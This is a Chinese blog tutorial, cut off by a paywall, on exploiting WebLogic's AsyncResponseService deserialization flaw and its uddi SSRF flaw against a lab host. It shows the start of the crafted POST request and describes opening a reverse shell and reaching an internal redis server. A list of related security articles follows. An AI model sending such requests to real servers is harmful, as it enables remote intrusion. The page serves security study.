WebLogic反序列化漏洞&SSRF漏洞

最新推荐文章于 2024-09-27 13:58:09 发布
最新推荐文章于 2024-09-27 13:58:09 发布
阅读量334 收藏
点赞数
分类专栏: 网络安全-渗透篇 文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Massimo__JAVA/article/details/130753480
版权
本文详细介绍了WebLogic的反序列化漏洞和SSRF漏洞。反序列化漏洞通过特定URL后的404页面识别,利用AsyncResponseService成功触发并反弹shell。SSRF漏洞出现在uddi组件,通过伪造请求探测内网服务,结合换行注入可攻击内网中的redis服务器,实现shell获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一反序列化漏洞

1)、特征
在被检测应用系统url后随机添加字符串,出现的404页面如下:
在这里插入图片描述说明被检测系统的中间件为WebLogic

2)、利用
启动环境
在这里插入图片描述访问AsyncResponseService
在这里插入图片描述说明存在漏洞

kali开启监听
在这里插入图片描述抓取访问AsyncResponseService 的数据包,发送到重发模块,并替换如下

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.133.128:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 797
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
最低0.47元/天 解锁文章
我眼里的Weblogic 反序列化
Vicl1fe的博客
06-02 353
前言 满怀期待的学习Weblogic反序列化 环境搭建 本来想着自己下载webloigc环境,搞了半天也没搞定,年少不知工具香。 还是选择了在docker里搭建,然后使用idea进行远程调试。 weblogic下载地址,我下载的是10.3.6.0的 https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html jdk7下载地址 http://www.oracle.com/java/technologies/jav
weblogic之T3反序列化
weixin_45682070的博客
03-02 2116
T3协议 什么是T3协议? 解释摘抄自此文 Weblogic的RMI规范的实现使用一个专有协议T3。 您可以将T3(和安全T3S)视为坐在http之上的一个图层,以公开/允许客户端的JNDI调用。 通常,T3协议用于与WebLogic控制台进行交互。 T3是用于在WebLogic服务器和其他types的Java程序之间传输信息的协议。 WebLogic会跟踪连接到应用程序的每个Java虚拟机。 为了将stream量传送到Java虚拟机,WebLogic创build一个T3连接。 这种types的连接通过消除
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1404
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
hw蓝队初级面试总结_weblogic反序列化流量特征(1)
2401_84296945的博客
05-16 658
需要完整版PDF学习资源。
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 2951
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
weblogic漏洞扫描工具 反序列化漏洞扫描工具
javagty6778的博客
03-16 282
weblogic工具 妄想试图weblogic一把梭目前检测的功能后期可以的话还会继续加功能的,主要是一些反序列化的poc真的不好写,我也不咋会…
2024年hw蓝队初级面试总结_weblogic反序列化流量特征(1)
2401_84254530的博客
05-02 2514
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
中间件漏洞测试——weblogic
qq_43592364的博客
08-13 1166
注意:下列漏洞复现是使用Ubuntu+docker实现的环境完成的,其中提到的IP通过Ubuntu虚拟机中的ifconfig命令查看,端口不变,需要环境的可通过docker相关环境下载 一、XML反序列化漏洞 1、漏洞简述&影响版本 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令、getshell等危害。 影响版本:Webl...
护网面试-JAVA漏洞和中间件篇
qq_52579508的博客
04-17 606
中间件IIS漏洞IIS PUT漏洞IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。版本:IIS6.0短文件名猜解漏洞IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。局限性1) 此漏洞只能确定前6个字符,如果后面的字符太长、包含特殊字符,很难猜解;2) 如果...
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3469
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
从防护角度看Weblogic反序列化历史漏洞
猪肉炖白菜
07-09 726
一、前言 Weblogic反序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果。随着每次补丁的修复,很多Weblogic反序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面比较广,所以近几年还是持续有新出漏洞的,这也体现了挖掘出新漏洞的高手们对java语言理解之深。目前在做渗透测
weblogic反序列化介绍及环境搭建
遇事不决冲冲冲
05-08 3972
weblogic是一个常用的web中间件,它的反序列化漏洞也算是比较经典,而在weblogic里面其实反序列化漏洞大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,一个原因就是配置环境配了好长时间,这篇就当作专门介绍环境搭建了吧Cve-2017-3506Cve-2017-10271Cve-2019-2729Cve-2019-2725CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2628 CVE-20
Javaweb安全——Weblogic反序列化漏洞(一)
weixin_43610673的博客
12-11 3256
从原生反序列化过程开始谈起。
weblogic反序列化之T3协议
snowlyzz的博客
01-16 3472
T3反序列化学习
网络安全——实操weblogic的ssrf漏洞
Demo不是emo的博客
09-18 2708
今天我们讲的还是ssrf漏洞的利用,选择的环境是weblogic的ssrf历史漏洞,需要用到vulhub靶场和docker环境,都给大家准备好了,需要的自取自用,这服务不得打满分啊?
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 828
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
hw蓝队初级面试总结
热门推荐
G208_522的博客
05-27 1万+
1、sql注入原理、分类、绕过 原理:产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。 分类:我们可以把sql注入直接的分为字符型和数字型,主要特点就是在进行sql注入的时候是否需要闭合传参的单引号,不需要闭合说明是数值型,反之就是字符型;还可以将sql注入分为有回显的注入和无回显的注入,无回显的注入又别称为盲注,盲注有三大
iwebsec靶场 反序列化关卡通关笔记2-反序列化漏洞示例02
最新发布
mooyuan的网络安全博客
09-27 1361
iwebsec靶场反序列化关卡渗透实战:关键函数destruct是通过参数来判断,如果传入参数时show就决定调用show函数,如果传入参数时login就调用login函数,另外如果参数时source就调用source函数。如上所示,打印了obj内容中的username和role,select *内容为3列,由于不知道顺序使什么样的,为了使可以查询password,我们可以构造语句。这里可以看到函数被wakeup函数处理,输出的内容中包含了mysql_escape_string,增加了转义符处理,如下所示。
iwebsec靶场 中间件漏洞通关笔记1-Weblogic中间件漏洞
mooyuan的网络安全博客
04-21 1755
通过实战iwebsec靶场的Weblogic SSRF中间件漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
Oracle WebLogic反序列化漏洞补丁安装指南
- **weblogic反序列化漏洞官方解决方案**:这部分内容为我们提供了一个针对WebLogic反序列化漏洞安全补丁信息,以及如何应用这个补丁的具体步骤。WebLogic反序列化漏洞是一种安全缺陷,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值